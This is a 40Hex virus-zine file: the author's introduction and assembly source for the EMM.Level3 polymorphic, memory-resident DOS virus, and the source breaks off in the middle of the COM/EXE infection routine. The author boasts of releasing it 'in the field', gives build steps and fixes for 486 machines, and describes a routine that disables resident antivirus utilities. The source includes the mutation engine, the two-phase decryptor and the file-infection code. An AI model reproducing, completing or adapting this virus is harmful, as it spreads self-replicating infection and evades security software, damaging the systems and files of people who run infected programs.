40Hex Issue 14 File 010

Published in 40Hex

40Hex Number 14 Volume 5 Issue 1                                      File 010 

comment %

Dear Virus Friends,

This is so far my latest production.
It is a polymorphic virus that uses some stealth techniques.
After execution of infected file, it goes memory-resident and hits com'n'exe
on execution or creation.
There are two interesting features to this.
First it is the polymorphic engine that generates two-phase decrypting routine.
First phase consists of various instructions, among them some decrypt phase two.
Phase two is a regular cyclical decryptor. (By altering phase two you probably
can avoid detection by the virus scanners.)
Second feature is demobilising of resident virus utilities (see source code
of function "eliminate_av" for further details).
Well, after I planted this virus in the field, I was told it does not run
on 486s. The problem is that prefetch queue is longer on 486 than on my home
machine and that's why self-modifying code does not work. Well, sorry for
that, I really didn't mean to.
To correct this problem, follow the instructions in the source code
marked by "#####".
To get a working copy of original EMM.Level3 virus do the following:
tasm level3.asm (I used ver. 2.51; do not use /M switch)
tlink level3.obj (I used ver. 4.00)
level3.exe

Btw, I am Vyvojar, and you may have met Explosion and One Half - the forerunners
to Level3.

(for SVL: I am looking forward to meeting :)) - I just don't know how we will get in touch ...
try asking for me on irc - channel #virus)

%

.model small
.stack 80h

host_segment segment
mov ax,4c00h
int 21h
host_segment ends

virus_segment segment
assume cs:virus_segment,ds:virus_segment

start_virus label near

DEPTH=5*3
sstack db DEPTH dup(?)
ssp dw DEPTH ;stack simulation

LENOVER=DEPTH ;length of overwritable bytes
LENVIR=(offset end_virus-offset start_virus)
LENHBUF=700 ;length of header buffer (for phase 1)
EXTENTION=(16+LENVIR+LENHBUF) ;by this number infected file grows
DEPSTACK=80h
LENFNB=64 ;length of file name buffer
LENDEC=(edec-sdec) ;decoder length (phase 2)
MEMPOS=04fbh ;memory location for far jump within segment 0000h
ORDER=25

strc struc ;structure for exe header
id dw ?
lpage dw ?
pages dw ?
items dw ?
parps dw ?
min dw ?
max dw ?
vSS dw ?
vSP dw ?
flag db ? ;com/exe determination
db ?
vIP dw ?
vCS dw ?
strc ends

bheader strc <1,,,,,,,0,,1,,0,0>

v16 dw 16
v30 dw 30
v512 dw 512

;********************** Explosion's Mutation Machine *********************

db '* EMM 1.0 *'
rnd_get:
push si
push ax
push bx
push cx
push dx
db 0b9h
rnd2 dw ?
db 0bbh
rnd1 dw ?
mov dx,015ah
mov ax,4e35h
xchg ax,si
xchg ax,dx
test ax,ax
jz rnd_l1
mul bx
rnd_l1: jcxz rnd_l2
xchg ax,cx
mul si
add ax,cx
rnd_l2: xchg ax,si
mul bx
add dx,si
inc ax
adc dx,0000h
mov cs:rnd1,ax
mov cs:rnd2,dx
mov ax,dx
pop cx
xor dx,dx
jcxz rdbz ;division by zero
div cx
jmp short danilak_vyskumnik
rdbz: xchg dx,ax ;if dx=0 on input then interval 0-ffff
danilak_vyskumnik:
pop cx
pop bx
pop ax
pop si
retn

registers label near ;flag,value,offset when w=0 (operation with byte)
rax db 3 dup(?),(offset rax-offset registers)
rcx db 3 dup(?),(offset rcx-offset registers)
rdx db 3 dup(?),(offset rdx-offset registers)
rbx db 3 dup(?),(offset rbx-offset registers)
rsp db 3 dup(?),(offset rax-offset registers)
rbp db 3 dup(?),(offset rcx-offset registers)
rsi db 3 dup(?),(offset rdx-offset registers)
rdi db 3 dup(?),(offset rbx-offset registers)
res db 4 dup(?)
rflag db 4 dup(?)

;bits in flag:
; 0 = lo part of register set if 1
; 1 = hi part of register set if 1
; 2 = don't change value of register if 1 (for sp)

fw db ? ;fw=0 when byte operation, fw=1 when word operation

choose:
push ax ;selection of routine according to the table
push cx ;ds:si points to the table
push dx ;table is in the format: byte/probability
push si ; word/adr of routine
xor cx,cx ;table ends with 0ffh
take_next: lodsb
cbw
add cx,ax
cmp al,0ffh
lodsw
jne take_next
inc cx ;subtract 0ffffh
pop si
mov dx,cx
call rnd_get
try_next: lodsb
cbw
sub cx,ax
lodsw
cmp dx,cx
jb try_next
xchg si,ax
pop dx
pop cx
pop ax
jmp si ;jump to the selected routine

getaddr: ;get addr of reg within registers table
push ax
push bx
mov si,dx
shl si,1
shl si,1
mov bx,offset registers
add si,bx
mov ch,3 ;mask for word register
cmp fw,0
jne chsl
add si,3
lodsb
cbw
xchg si,ax
add si,bx
dec ch ;mask for hi byte of reg
test dl,04h
jnz chsl
dec ch ;mask for lo byte of reg
chsl: pop bx
pop ax
retn

gregl: ;select target reg (output in dx)
push cx
push si
gregl_other: mov dx,8
call rnd_get
call getaddr
test byte ptr [si],04h ;can I modify value of reg?
jnz gregl_other
pop si
pop cx
retn

gregp: ;select source reg with defined value (output in dx)
push ax
xor ah,ah
jmp short kazisvet_prefikany
gregls: ;select target reg with defined value (output in dx)
push ax
gl108: mov ah,04h
kazisvet_prefikany:
push cx
push si
push bp
mov dx,8
call rnd_get
mov bp,dx
xor dx,dx
mov cl,dl
grdl1: call getaddr
lodsb
test al,ah
jnz grng1
and al,03h
cmp al,03h
je vrah_pocitacovy_kosicky
cmp al,ch
jne grng1
vrah_pocitacovy_kosicky:
inc cx
dec bp
js tulen_bacil
grng1: inc dx
cmp dx,8
jb grdl1
or cl,cl
jnz gra1v
stc
jmp short grnv
gra1v: and dx,07h
jmp grdl1
tulen_bacil: clc
grnv: pop bp
pop si
pop cx
pop ax
retn

wtreg: ;write value into reg
push cx
push si
call getaddr
inc si
cmp ch,3
jne wtw1
mov [si],ax
jmp short wtb1
wtw1: cmp ch,1
je panko_revizor
inc si
panko_revizor: mov [si],al
wtb1: pop si
pop cx
retn

rfreg: ;read value from reg
push cx
push si
call getaddr
inc si
cmp ch,3
jne rfw1
lodsw
jmp short rfb1
rfw1: cmp ch,1
je rfnp
inc si
rfnp: lodsb
rfb1: pop si
pop cx
retn

shl3fw:
or al,fw
shl3dl:
push dx
mov cl,3
shl dl,cl
or ah,dl
pop dx
retn

;************************* generating of MOV *********************

;generating of mov reg,imm
mt1:
call gregl
push dx
mov al,fw
mov cl,3
shl al,cl
or al,10110000b
or al,dl
stosb
xor dx,dx
call rnd_get
xchg ax,dx
pop dx
call wtreg
call getaddr
or [si],ch
cmp ch,3
jne bt1
stosw
jmp wd1
bt1: stosb
wd1: retn

;generating of mov reg,reg
mt2:
call gregp
jc wd1
call rfreg
push ax
mov ax,1100000010001010b
or al,fw
or ah,dl
mov bx,dx
nti1: call gregl
cmp bx,dx
je nti1
call shl3dl
stosw
pop ax
call wtreg
call getaddr
or [si],ch
retn

chtab00 db 45
dw offset mt1
db 45
dw offset mt2
db 3
dw offset mt6
db 3
dw offset mt7
db 1
dw offset mt3
db 1
dw offset mt4
db 1
dw offset mt5
db 0ffh
gmovr:
mov si,offset chtab00
jmp choose

;generating of mov ds,reg
mt5:
mov fw,1
test res+3,1
jnz mt5err ;if ds is set to cs, do nothing
call gregp
jc mt5err
mov ax,1101100010001110b
or ah,dl
stosw
mt5err: retn

;generating of mov reg,sreg
mt4:
mov fw,1
mov dx,20h
call rnd_get
mov ax,1100000010001100b
or ah,dl
and ah,0f8h
call gregl
or ah,dl
stosw
call getaddr
and ah,00011000b
jz sppse
and byte ptr [si],0fch ;value in reg is not valid
retn
sppse: mov al,res
mov [si],al
mov ax,word ptr res+1
mov [si+1],ax
retn

;generating of mov es,reg
mt3:
mov fw,1
call gregp
jc mt3err
mov ax,1100000010001110b
or ah,dl
stosw
call rfreg
or res,3
mov word ptr res+1,ax
mt3err: retn

;generating of xor X,X
mt6:
mov al,00110010b
jmp short com67

;generating of sub X,X
mt7:
mov al,00101010b
com67: mov ah,11000000b
call gregl
or ah,dl
call getaddr
or [si],ch ;reg is set to zero and has valid value
mov word ptr ds:(offset gl102),0c032h
jmp short pcpm67

;******************** general part for OR, AND, ... ************************

perform_oper_l2:
mov al,fw
add byte ptr ds:(offset gl102),al
call rfreg
mov bp,word ptr rflag+1
push bp
popf
sti
cld
gl102: or al,bl
pushf
pop bp
mov word ptr rflag+1,bp
jmp wtreg

perform_oper_l1:
call perform_oper_l2
or rflag,1
retn

chtab01 db 45
dw offset ot1
db 45
dw offset ot2
db 10
dw offset ot3
db 0ffh
ggen2:
lodsb
mov ah,0c3h
mov word ptr ds:(offset gl102),ax
lodsb
mov byte ptr ds:(offset gl104+1),al
lodsb
mov ah,11000000b
mov word ptr ds:(offset gl105+1),ax
lodsw
mov word ptr ds:(offset gl106+1),ax
mov si,offset chtab01
jmp choose

;generating of ins a?,imm
ot3:
xor dx,dx
call getaddr
lodsb
and al,03h
cmp al,03h
je ot3obn
cmp al,ch
jne ot1
ot3obn: push dx
gl104: mov al,00001100b
or al,fw
stosb
jmp short tozti

;generating of ins reg,reg
ot2:
call gregp
jc wdort1
call rfreg
xchg bx,ax
gl105: mov ax,1100000000001010b
or ah,dl
call gregls
jc wdort1
pcpm67: call shl3fw
stosw
jmp perform_oper_l1

;generating of ins reg,imm
ot1:
call gregls
jc wdort1
push dx
gl106: mov ax,1100100010000000b
or al,fw
or ah,dl
stosw
tozti: xor dx,dx
call rnd_get
mov bx,dx
pop dx
call perform_oper_l1
xchg ax,bx
cmp fw,0
je bort1
stosw
jmp wdort1
bort1: stosb
wdort1: retn

;*********************** generating of OR ***************************
orrdat db 0ah ;oper AL,BL ... inc ... oper AX,BX
db 00001100b ;oper a?,imm
db 00001010b ;oper reg,reg
dw 1100100010000000b ;oper reg,imm
gorr:
mov si,offset orrdat
pgen21: jmp ggen2
;*********************** generating of AND ***************************
andrdat db 22h ;oper AL,BL ... inc ... oper AX,BX
db 00100100b ;oper a?,imm
db 00100010b ;oper reg,reg
dw 1110000010000000b ;oper reg,imm
gandr:
mov si,offset andrdat
jmp pgen21
;*********************** generating of XOR ***************************
xorrdat db 32h ;oper AL,BL ... inc ... oper AX,BX
db 00110100b ;oper a?,imm
db 00110010b ;oper reg,reg
dw 1111000010000000b ;oper reg,imm
gxorr:
mov si,offset xorrdat
pggen2: jmp pgen21
;*********************** generating of TEST **************************
testrdt db 84h ;oper AL,BL ... inc ... oper AX,BX
db 10101000b ;oper a?,imm
db 10000100b ;oper reg,reg
dw 1100000011110110b ;oper reg,imm
gtestr:
mov si,offset testrdt
ggen3: mov byte ptr ds:(offset gl108+1),00h ;target register can be any register set to proper value
call ggen2
mov byte ptr ds:(offset gl108+1),04h ;restore
retn
;*********************** generating of CMP ***************************
cmprdat db 3ah ;oper AL,BL ... inc ... oper AX,BX
db 00111100b ;oper a?,imm
db 00111010b ;oper reg,reg
dw 1111100010000000b ;oper reg,imm
gcmpr:
mov si,offset cmprdat
jmp ggen3
;*********************** generating of ADD ***************************
addrdat db 02h ;oper AL,BL ... inc ... oper AX,BX
db 00000100b ;oper a?,imm
db 00000010b ;oper reg,reg
dw 1100000010000000b ;oper reg,imm
gaddr:
mov si,offset addrdat
jmp pggen2
;*********************** generating of SUB ***************************
subrdat db 2ah ;oper AL,BL ... inc ... oper AX,BX
db 00101100b ;oper a?,imm
db 00101010b ;oper reg,reg
dw 1110100010000000b ;oper reg,imm
gsubr:
mov si,offset subrdat
jmp pggen2
;*********************** generating of ADC ***************************
adcrdat db 12h ;oper AL,BL ... inc ... oper AX,BX
db 00010100b ;oper a?,imm
db 00010010b ;oper reg,reg
dw 1101000010000000b ;oper reg,imm
gadcr:
mov si,offset adcrdat
ggen4: test rflag,1
jnz pggen2
gg10err: retn
;*********************** generating of SBB ***************************
sbbrdat db 1ah ;oper AL,BL ... inc ... oper AX,BX
db 00011100b ;oper a?,imm
db 00011010b ;oper reg,reg
dw 1101100010000000b ;oper reg,imm
gsbbr:
mov si,offset sbbrdat
jmp ggen4

;***************** general part for INC,DEC,... ******************

chtab03 db 1
dw offset inct2
chtab04 db 1
dw offset inct1
db 0ffh
ggen11:
lodsw
mov word ptr ds:(offset gl102),ax
lodsw
mov word ptr ds:(offset gl201+1),ax
lodsb
mov byte ptr ds:(offset gl202+1),al
gl203: mov si,offset chtab03
jmp choose

;generating of ins reg8 or ins reg16 (2 bytes)
inct1:
call gregls
jc gg10err
gl201: mov ax,1100000011111110b
ggen21: or al,fw
or ah,dl
stosw
jmp perform_oper_l2

;generating of ins reg16 (1 byte)
inct2:
mov fw,1
call gregls
jc gg10err
gl202: mov al,01000000b
or al,dl
stosb
jmp perform_oper_l2

;*********************** generating of INC ***************************
incrdat dw 0c0feh ;operation
dw 1100000011111110b ;2 bytes
db 01000000b ;1 byte
gincr:
mov si,offset incrdat
jmp ggen11
;*********************** generating of DEC ***************************
decrdat dw 0c8feh ;operation
dw 1100100011111110b ;2 bytes
db 01001000b ;1 byte
gdecr:
mov si,offset decrdat
jmp ggen11
;*********************** generating of NEG ***************************
negrdat dw 0d8f6h ;operation
dw 1101100011110110b ;2 bytes
gnegr:
mov si,offset negrdat
push di
call ggen12
pop ax
cmp di,ax ;if no operation performed then no flags set
jna inegbv
or rflag,1
inegbv: retn
;*********************** generating of NOT ***************************
notrdat dw 0d0f6h ;operation
dw 1101000011110110b ;2 bytes
gnotr:
mov si,offset notrdat
ggen12: mov word ptr ds:(offset gl203+1),offset chtab04
call ggen11
mov word ptr ds:(offset gl203+1),offset chtab03
xt1err: retn

;*********************** generating of XCHG **************************

chtab05 db 1
dw offset xchgt1
db 1
dw offset xchgt2
db 0ffh
gxchgr:
mov si,offset chtab05
jmp choose

;generating of xchg reg,reg (2 bytes)
xchgt1:
call gregls ;source operand
jc xt1err
call rfreg
xchg bx,ax
mov ax,1100000010000110b
or ah,dl
mov bp,dx
call gregls ;target operand
cmp bp,dx
je xt1err
push bp
call shl3fw
stosw
gl301: call rfreg
xchg ax,bx
call wtreg
pop dx
xchg ax,bx
jmp wtreg

;generating of xchg ax,reg (1 byte)
xchgt2:
mov fw,1
call gregls
jc xt1err
cmp rax,03h
jne xt1err
call rfreg
xchg bx,ax
mov al,10010000b
or al,dl
push dx
xor dx,dx ;target operand
stosb
jmp gl301

;***************** general part for SHL,SHR,... ******************

ggen20:
mov al,11010000b
test rcx,1 ;valid value in cl ?
jz rbsh1
mov dx,2
call rnd_get ;shl ,cl or shl ,1 ?
shl dl,1
or al,dl
mov cl,rcx+1
rbsh1: mov word ptr ds:(offset gl102),ax
call gregls
jc gg20err
and rflag,0feh ;flags not defined
jmp ggen21

;********************* generating of SHL,SAL *************************
gshlr:
mov ah,11100000b
jmp ggen20
;*********************** generating of SHR ***************************
gshrr:
mov ah,11101000b
jmp ggen20
;*********************** generating of SAR ***************************
gsarr:
mov ah,11111000b
jmp ggen20
;*********************** generating of ROL ***************************
grolr:
mov ah,11000000b
jmp ggen20
;*********************** generating of ROR ***************************
grorr:
mov ah,11001000b
jmp ggen20
;*********************** generating of RCL ***************************
grclr:
mov ah,11010000b
ggen22: test rflag,1
jz gg20err
jmp ggen20
gg20err: retn
;*********************** generating of RCR ***************************
grcrr:
mov ah,11011000b
jmp ggen22

;*********************** generating of PUSH **************************

chtab06 db 15
dw offset gpt1
db 3
dw offset gpt2
db 1
dw offset gpt3
db 0ffh
gpushr:
cmp ssp,0
je gg20err ;emulated stack full
mov si,offset chtab06
gl410: mov fw,1
jmp choose

;type: push reg
gpt1:
call gregl ;can push any reg (except sp)
mov al,01010000b
or al,dl
stosb
call getaddr
lodsb
xchg cx,ax
call rfreg

;-------- simulation of PUSH --------
spush:
sub ssp,3
sub word ptr rsp+1,2
mov si,ssp
mov byte ptr [si+offset sstack],cl
mov word ptr [si+offset sstack+1],ax
retn

;type: push sreg
gpt2:
mov dx,00100000b
call rnd_get
xchg ax,dx
or al,00000110b
and al,11111110b
gl409: stosb
xor cl,cl
cmp al,00000110b
jne spush
mov ax,word ptr res+1
mov cl,res ;if it is es
jmp spush

;type: pushf
gpt3:
mov al,10011100b
jmp gl409

;*********************** generating of POP ***************************

chtab07 db 15
dw offset gpot1
db 2
dw offset gpot2
db 1
dw offset gpot3
db 3
dw offset gpot4
db 0ffh
gpopr:
cmp ssp,DEPTH
je gg20err ;emulated stack is empty
mov si,offset chtab07
jmp gl410

;type: pop reg
gpot1:
call gregl ;can pop any reg (except sp)
mov al,01011000b
or al,dl
stosb
call spop
call getaddr
mov byte ptr [si],cl
call wtreg
retn

;-------- simulation of POP --------
spop:
mov si,ssp
mov cl,byte ptr [si+offset sstack]
mov ax,word ptr [si+offset sstack+1]
add ssp,3
add word ptr rsp+1,2
retn

;type: pop es
gpot2:
mov al,00000111b
stosb
call spop
mov res,cl
mov word ptr res+1,ax
chpote: retn

;type: pop ds
gpot3:
test res+3,1
jnz chpote ;if ds set to cs do nothing
mov al,00011111b
stosb
jmp spop

;type: push cs,pop ds
gpot4:
test res+3,1
jnz chpote
mov ax,0001111100001110b
stosw
or res+3,1 ;note that ds is set
retn

;********************* generating of jumps **************************

MAXJMP=20
gbytes:
push ax
push cx
push dx
mov cx,dx
jcxz gbsdda
gbdb: xor dx,dx
call rnd_get
xchg ax,dx
stosb
loop gbdb
gbsdda: pop dx
pop cx
pop ax
retn
takeb:
call rnd_get
add si,dx
lodsb
retn

NOJCON=17
jcontab db 01110111b ;ja/jnbe
db 01110011b ;jae/jnb/jnc
db 01110010b ;jb/jnae/jc
db 01110110b ;jbe/jna
db 01110100b ;je/jz
db 01111111b ;jg/jnle
db 01111101b ;jge/jnl
db 01111100b ;jl/jnge
db 01111110b ;jle/jng
db 11101011b ;jmp
db 01110101b ;jne/jnz
db 01110001b ;jno
db 01111011b ;jnp/jpo
db 01111001b ;jns
db 01110000b ;jo
db 01111010b ;jp/jpe
db 01111000b ;js
jcxdtab db 11100011b ;jcxz
db 11100010b ;loop
db 11100001b ;loope/loopz
db 11100000b ;loopne/loopnz

chtab09 db 24
dw offset gjcon
db 5
dw offset gjcxd
db 1
dw offset gjmpn
db 3
dw offset gcall
db 0ffh
gjmp:
mov si,offset chtab09
jmp choose

;generating of jx
gjcon:
test rflag,1
jz g40err
mov si,offset jcontab
mov dx,NOJCON
ggen41: call takeb
stosb
mov byte ptr ds:(offset gl501),al
mov cx,word ptr rcx+1
mov bp,word ptr rflag+1
push bp
popf

;#####
;to run on 486 supply this:
; jmp $+2
;#####

gl501: jmp short gl502
xor dx,dx
call rnd_get
xchg ax,dx
stosb
jmp short g40mcx
gl502: mov dx,MAXJMP ;max no of bytes to jump over
call rnd_get
mov al,dl
stosb
call gbytes
g40mcx: mov word ptr rcx+1,cx
g40err: retn

;generating of jcxz,loopx
gjcxd:
cmp rcx,3
jne g40err
mov si,offset jcxdtab
mov dx,2
test rflag,1
jz ggen41
mov dx,4
jmp ggen41

;generating of jmp near
gjmpn:
mov al,11101001b
stosb
mov dx,MAXJMP
call rnd_get
mov ax,dx
stosw
jmp gbytes

;generating of call X
gcall:
test byte ptr eflag,4
jz g40err ;can't generate call if no retn before
mov al,11101000b
stosb
mov ax,retnaddr
dec ax
dec ax
sub ax,di
stosw
retn

;****************** generating of sti,cli,std,cld **********************

sacftb label byte
sti
cli
std
cld
gsacf:
mov si,offset sacftb
mov dx,4
call takeb
stosb
retn

;********************* generating of mem. ins. *************************

chtab10 db 4
dw offset pissi
db 4
dw offset pisdi
db 4
dw offset pisbx
db 1
dw offset pisbr
db 0ffh
g2ndb:
mov si,offset chtab10
jmp choose
pissi: mov bp,word ptr rsi+1
mov ah,10000100b
cmp rsi,3
je chenbr
pisdi: mov bp,word ptr rdi+1
mov ah,10000101b
cmp rdi,3
je chenbr
pisbx: mov bp,word ptr rbx+1
mov ah,10000111b
cmp rbx,3
je chenbr
pisbr: xor bp,bp
mov ah,00000110b
chenbr: retn

insertcs:
test res+3,1 ;ds set to cs ?
jnz jtdss
mov byte ptr [di],2eh ;insert cs: prefix
inc di
jtdss: retn

ggen60: call gregp
jc gmerr
push ax
call rfreg
or al,al
pop ax
jz gmerr ;to avoid operation with 0
call shl3dl
ggen61: or al,fw
call insertcs
stosw
mov si,ptei
mov word ptr [si],ax
call rfreg
mov word ptr [si+4],ax
mov dx,LENDEC
sub dl,fw ;to enable proper rotation
call rnd_get
mov word ptr [si+2],dx
add ptei,6
mov ax,sodec
add ax,dx
sub ax,bp
stosw
and rflag,0feh ;flags modified
gmerr: retn

chtb20o db 6,8,8,2,2 ;starting probabilities for memory-modifying instructions
chtab20 db ?
dw offset gxorp
db ?
dw offset gaddp
db ?
dw offset gsubp
db ?
dw offset grolp
db ?
dw offset grorp
db 0ffh
gmutp:
cmp ptei,offset eei
jnb gmerr
call g2ndb
mov si,offset chtab20
jmp choose
gxorp:
mov al,00110000b
jmp ggen60
gaddp:
mov al,00000000b
jmp ggen60
gsubp:
mov al,00101000b
jmp ggen60
grolp:
mov al,11010000b
mov dx,4
call rnd_get
or dx,dx
jz zbclns
test rcx,1 ;cl set ?
jz zbclns
cmp rcx+1,0
je zbclns ;does not generate rotation ,cl if cl=0
or al,00000010b
zbclns: mov dx,1 ;address for emulated cx
jmp ggen61
grorp:
or ah,00001000b
jmp grolp

;********************* generating of mem. mov **************************

chtab30 db 5
dw offset pmvt1
db 1
dw offset pmvt2
db 0ffh
gmovp:
call g2ndb
mov si,offset chtab30
jmp choose

;type: mov reg,mem
pmvt1:
call gregl
mov al,10001010b
call shl3fw
push dx
call insertcs
stosw
mov dx,di
sub dx,offset hbuf+1
call rnd_get ;in dx offset within header buffer
mov ax,rel
add ax,dx
sub ax,bp
stosw
xchg ax,dx
pop dx
call getaddr
or [si],ch ;reg value is valid
mov si,offset hbuf
add si,ax
lodsw
jmp wtreg ;read byte and write to reg

;type: mov mem,reg
pmvt2:
call gregp
jc pmverr
mov al,10001000b
call shl3fw
call insertcs
stosw
mov dx,LENOVER-1
call rnd_get ;in dx offset within overwritable bytes
mov ax,gba
add ax,dx
sub ax,bp
stosw
pmverr: retn

chtabgl db 13
dw offset gjmp
db 32
dw offset gmutp
db 17
dw offset gmovp
chtabg1 db 70
dw offset gmovr
db 1
dw offset gsacf
db 16
dw offset gpushr
db 16
dw offset gpopr
db 4
dw offset gshlr
db 4
dw offset gshrr
db 2
dw offset gsarr
db 2
dw offset grolr
db 2
dw offset grorr
db 2
dw offset grclr
db 2
dw offset grcrr
db 7
dw offset gorr
db 7
dw offset gandr
db 4
dw offset gxorr
db 4
dw offset gtestr
db 9
dw offset gaddr
db 9
dw offset gsubr
db 2
dw offset gadcr
db 2
dw offset gsbbr
db 4
dw offset gcmpr
db 4
dw offset gincr
db 4
dw offset gdecr
db 4
dw offset gxchgr
db 2
dw offset gnegr
db 2
dw offset gnotr
db 0ffh

EMM:
cld
mov cx,10
mov di,offset registers
xor ax,ax
li1: stosb ;initialize variables
add di,3
loop li1
xchg bx,ax ;bx=0
mov al,eflag
and al,01h
mov res+3,al ;if al=1 ds is set, if al=0 ds is not set
mov al,04h
test byte ptr eflag,2
jz nsspj
or al,03h
nsspj: or rsp,al ;don't change sp , known value of sp on input
mov ssp,DEPTH ;initialize ssp
mov ptei,offset ei ;initialize ptei
neprkm: mov cx,5
mov si,offset chtb20o
mov di,offset chtab20
sprpm: lodsb
cbw
xchg dx,ax
call rnd_get
xchg ax,dx
add bx,ax
stosb
inc di
inc di
loop sprpm ;setting of probabilities for memory-modifying instructions
or bx,bx
jz neprkm ;not accepted setting of the probabilities
mov di,offset hbuf
mov ax,-1
push ax
test byte ptr eflag,4 ;generate intro garbage bytes ?
jz ngenuv
pop ax
MAXINTRO=100
mov dx,MAXINTRO-1
call rnd_get
inc dx ;in dx length of intro in bytes
push dx
push dx
call rnd_get
call gbytes ;write down random bytes
mov retnaddr,di ;address of retn instruction
mov al,11000011b
stosb ;write retn
pop ax
sub ax,dx
xchg dx,ax
call gbytes ;random bytes
ngenuv: mov ax,di
sub ax,offset hbuf
add ax,rel
mov hip,ax ;ip value for the file
MINHDR=400 ;minimal header length
mov dx,LENHBUF-LENDEC-MINHDR+1
pop ax ;in ax length of intro-1
sub dx,ax
call rnd_get
add dx,ax
add dx,MINHDR ;in dx start of decoder
;relatively to start of hbuf, i.e. header length
mov hend,dx
add hend,offset hbuf ;relocation relat. to start of buffer
add dx,rel
mov sodec,dx ;start of decoder within the file
mov word ptr ds:(offset chchtb+1),offset chtabgl ;use all instructions
mov byte ptr ds:(offset sj1+1),0 ;setting of the switched jump
next_inst:
push di
mov dx,3
call rnd_get
or dl,dl
jz ginsh
mov dl,1
ginsh: mov fw,dl ;byte or word inst.
chchtb: mov si,offset chtabgl
call choose ;generating of inst.
pop ax
sj1: jmp short gc1
gc1: push di

;#####
;to run on 486 change the following instruction
;which goes: add di,MAXJMP+3-1
;into: add di,40 ;prefetch queue is 32B for 486
;#####

add di,MAXJMP+3-1
cmp di,hend
pop di
jb next_inst
mov word ptr ds:(offset chchtb+1),offset chtabg1 ;do not generate mem-modifying ins.
mov byte ptr ds:(offset sj1+1),offset gc2-offset gc1 ;switch of jump
jmp next_inst
gc2: cmp di,hend
jb next_inst
xchg di,ax
jne next_inst ;if not end of header then repeat
xchg di,ax
mov bx,di
mov ax,offset stsub+(hbuf-start_virus)-LENVIR-(dcjmp-sdec)-2
sub ax,di
mov dcjmp,ax ;setting the jump in decoder
mov si,offset sdec
mov cx,LENDEC
rep movsb ;copy decoder behind header
mov si,ptei
udzd: cmp si,offset ei
jna vsmu
sub si,6 ;reading of mem-modif. inst. in reverse order
mov al,byte ptr [si]
mov dl,al
and dl,11111100b
cmp dl,00000000b
jne zop1
or al,00101000b
zop1: cmp dl,00101000b
jne zop2
and al,00000011b
zop2: mov ah,10001111b
and word ptr [si],0011100011111100b
cmp word ptr [si],0000100011010000b
jne njtsp
and ah,11000111b ;xchange ADD for SUB, ROL for ROR and vice versa
njtsp: mov word ptr ds:(offset vari),ax
mov dx,word ptr [si+2]
mov word ptr ds:(offset vari+2),dx
mov cx,word ptr [si+4]
jmp $+2
vari: xor [bx+1234h],cx ;perform reverse operation on decoder
jmp udzd
vsmu: retn

;******************* decoder ****************

sdec:
sti
push cs
pop ds
dcmsi: mov si,1234h
dcmax: mov ax,1234h
mov cx,(LENVIR-1)/2+1
dp2: xor [si],ax
jmp short dcaax1
dcaax2: add ax,1234h
inc si
loop dp2
db 0e9h
dcjmp dw ?
dcaax1: add ax,1234h
inc si
xor [si],ax
jmp dcaax2

edec label near

;******************** Explosion's Mutation Machine ********************

;*************** copied routines **************

zencode:
mov cx,LENVIR
xor dx,dx ;offset start_virus
call zzp1
mov ah,40h
mov bx,handle
pushf
db 9ah
dd ? ;call ds:oriv21
jc zec1
cmp ax,cx
zec1: pushf
call zzp1
popf
retn
zzp1: push cx
mov si,dx
zecmax: mov ax,1234h
mov cx,(LENVIR-1)/2+1
zzp2: xor [si],ax
zecaax1: add ax,1234h
inc si
xor [si],ax
zecaax2: add ax,1234h
inc si
loop zzp2
pop cx
retn

zres24:
mov al,03h
iret

zenden label near

;************** routines for res. part *************

set_on_24:
push dx
push ds
push cs
pop ds
mov ax,3524h
call int21
mov seg24,es
mov off24,bx
mov ax,2524h
mov dx,offset res24
call int21
pop ds
pop dx
retn

set_off_24:
mov ax,2524h
lds dx,dword ptr cs:off24
call int21
retn

identify: ;is file infected ?
push dx
mov ax,es:[bx+2]
inc ax
xor dx,dx
div cs:v30
mov ax,es:[bx]
and al,11111b
cmp al,dl
stc
je iekon ;already infected
mov ax,es:[bx]
and ax,0ffe0h
or al,dl
clc
iekon: pop dx
retn

;*********** infect EXE,COM ***********

write_file:
mov ah,40h
jmp short s1
read_file:
mov ah,3fh
s1: call s2
jc s3
cmp ax,cx
s3: retn
start_file:
xor cx,cx
mov dx,cx
pos_start:
mov ax,4200h
jmp short s2
end_file:
xor cx,cx
mov dx,cx
pos_end:
mov ax,4202h
mhandle:
s2: mov bx,cs:handle
int21:
pushf
cli
call cs:oriv21
retn

infect:
mov ax,5700h
call mhandle
mov bx,offset ftime
mov [bx],cx
mov [bx+2],dx ;read in time and date of last write
call identify
jnc ienjnp
igbck: retn

ienjnp: xor dx,dx
call rnd_get
mov word ptr ds:(offset dcmax+1),dx
mov word ptr ds:(offset ecmax+1),dx
xor dx,dx
call rnd_get
mov word ptr ds:(offset dcaax1+1),dx
mov word ptr ds:(offset ecaax1+1),dx
xor dx,dx
call rnd_get
mov word ptr ds:(offset dcaax2+1),dx
mov word ptr ds:(offset ecaax2+1),dx ;values for encoding

call start_file
mov cx,18h
mov dx,offset header
call read_file
pigbck: jc igbck
mov si,dx
mov di,offset bheader
rep movsb
push dx
call end_file
mov lenlo,ax
mov lenhi,dx
mov si,ax
mov di,dx
pop bx
cmp [bx].id,'MZ'
je iEXE1
cmp [bx].id,'ZM'
je iEXE1
mov bheader.flag,0 ;0 means COM
cmp ax,65535-(EXTENTION+DEPSTACK) ;much too long ?
ja igbck
mov bheader.min,0000h ;min. memory is 0
jmp short iCOM1
iEXE1: mov bheader.flag,1
mov ax,[bx].pages
mul v512
sub ax,si
sbb dx,di
jc pigbck ;overlay detected
mov ax,si
mov dx,di
add ax,EXTENTION
adc dx,0
div v512
or dx,dx
jz spcp1 ;special case is that dx=0
inc ax
spcp1: mov [bx].pages,ax
mov [bx].lpage,dx ;setting pages and bytes in last page
iCOM1: and si,0fff0h
add si,16
adc di,0
mov dx,si
mov cx,di
push bx
call pos_start ;alignment to a multiple of 16
pop bx
cmp bheader.flag,0
jne iEXE2
mov byte ptr [bx],0e9h ;getting ready for jump
add ax,100h
mov gba,ax
add ax,LENVIR
mov rel,ax
mov eflag,001b ;setting parameters for EMM
jmp short iCOM2
iEXE2: mov ax,[bx].parps
mul v16
sub si,ax
sbb di,dx
mov ax,si
mov dx,di
div v16
mov [bx].vCS,ax
mov bheader.id,ax ;store org cs
mov ax,[bx].vSS
mul v16
mov cx,[bx].vSP
add ax,cx
adc dx,0
sub ax,si
sbb dx,di
jc zjvs
sub ax,DEPSTACK
sbb dx,0
jc pikon1
add [bx].vSS,(EXTENTION-1)/16
zjvs: mov rel,LENVIR
mov gba,0
mov word ptr rsp+1,cx
mov eflag,010b ;setting parameters for EMM
iCOM2: mov ax,gba
